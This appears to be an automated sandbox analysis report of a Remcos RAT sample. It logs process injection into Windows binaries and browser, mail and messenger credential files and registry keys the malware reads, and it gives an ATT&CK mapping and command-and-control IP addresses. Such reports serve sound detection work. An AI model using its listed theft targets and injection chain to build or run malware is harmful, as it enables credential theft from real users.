                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_004120F7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00419627 mouse_event,3_2_00419627
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"Jump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"Jump to behavior
                    Source: SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerMO\
                    Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerMO\59
                    Source: SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWindowogs.dat}
                    Source: SndVol.exe, 00000003.00000002.4408561480.0000000003460000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00434C52 cpuid 3_2_00434C52
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_0292431E
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_0291D5C8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_02905A78
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: GetLocaleInfoA,0_2_0290A788
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: GetLocaleInfoA,0_2_0290A73C
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_0291D5C8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_00452036
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_004520C3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_00452313
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_00448404
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0045243C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_00452543
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452610
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,3_2_0040F8D1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_004488ED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451CD8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_00451F50
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_00451F9B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_053995BA
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,3_2_0536059E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_053A3109
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_053990D1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_053A3210
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_053A32DD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_053A2D03
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_053A2D90
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_053A2C1D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,3_2_053A2C68
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,3_2_053A2FE0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_053A29A5
                    Source: C:\Windows\SysWOW64\SndVol.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02909184 GetLocalTime,0_2_02909184
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041B60D GetComputerNameExW,GetUserNameW,3_2_0041B60D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_00449190
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290B704 GetVersionExA,0_2_0290B704
                    Source: C:\Windows\SysWOW64\SndVol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040BA12
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040BB30
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db3_2_0040BB30
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: ESMTPPassword7_2_004033F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword7_2_00402DB3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword7_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5480, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMOJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe3_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts
                    111
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter
                    1
                    Valid Accounts
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    111
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Windows Service
                    1
                    Valid Accounts
                    1
                    Software Packing
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Registry Run Keys / Startup Folder
                    11
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    3
                    Credentials In Files
                    1
                    System Network Connections Discovery
                    Distributed Component Object Model111
                    Input Capture
                    1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Windows Service
                    1
                    Bypass User Account Control
                    LSA Secrets3
                    File and Directory Discovery
                    SSH3
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts622
                    Process Injection
                    11
                    Masquerading
                    Cached Domain Credentials48
                    System Information Discovery
                    VNCGUI Input Capture113
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                    Registry Run Keys / Startup Folder
                    1
                    Valid Accounts
                    DCSync251
                    Security Software Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    Virtualization/Sandbox Evasion
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow4
                    Process Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron622
                    Process Injection
                    Network Sniffing1
                    Application Window Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    System Owner/User Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1441701 Sample: HGTQP09643009.scr.exe Startdate: 15/05/2024 Architecture: WINDOWS Score: 100 47 onedrive.live.com 2->47 49 dual-spov-0006.spov-msedge.net 2->49 51 5 other IPs or domains 2->51 67 Snort IDS alert for network traffic 2->67 69 Multi AV Scanner detection for domain / URL 2->69 71 Found malware configuration 2->71 73 13 other signatures 2->73 9 HGTQP09643009.scr.exe 1 1 2->9         started        14 Jsqwmpul.PIF 2->14         started        signatures3 process4 dnsIp5 53 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49704, 49705 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->53 41 C:\Users\Public\Jsqwmpul.url, MS 9->41 dropped 89 Detected unpacking (creates a PE file in dynamic memory) 9->89 91 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 9->91 93 Writes to foreign memory regions 9->93 97 4 other signatures 9->97 16 SndVol.exe 3 16 9->16         started        21 extrac32.exe 1 9->21         started        95 Multi AV Scanner detection for dropped file 14->95 23 SndVol.exe 14->23         started        file6 signatures7 process8 dnsIp9 43 107.175.229.139, 49707, 49708, 8087 AS-COLOCROSSINGUS United States 16->43 45 geoplugin.net 178.237.33.50, 49709, 80 ATOM86-ASATOM86NL Netherlands 16->45 37 C:\ProgramData\remcos\logs.dat, data 16->37 dropped 55 Contains functionality to bypass UAC (CMSTPLUA) 16->55 57 Detected Remcos RAT 16->57 59 Tries to steal Mail credentials (via file registry) 16->59 63 7 other signatures 16->63 25 Jsqwmpul.PIF 16->25         started        28 SndVol.exe 1 16->28         started        30 SndVol.exe 1 16->30         started        32 3 other processes 16->32 39 C:\Users\Public\Libraries\Jsqwmpul.PIF, PE32 21->39 dropped 61 Drops PE files with a suspicious file extension 21->61 file10 signatures11 process12 signatures13 75 Writes to foreign memory regions 25->75 77 Allocates memory in foreign processes 25->77 79 Creates a thread in another existing process (thread injection) 25->79 81 Injects a PE file into a foreign processes 25->81 34 colorcpl.exe 25->34         started        83 Tries to steal Instant Messenger accounts or passwords 28->83 85 Tries to steal Mail credentials (via file / registry access) 28->85 87 Tries to harvest and steal browser information (history, passwords, etc) 30->87 process14 signatures15 65 Detected Remcos RAT 34->65

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    HGTQP09643009.scr.exe61%ReversingLabsWin32.Backdoor.Remcos
                    HGTQP09643009.scr.exe60%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Libraries\Jsqwmpul.PIF61%ReversingLabsWin32.Backdoor.Remcos
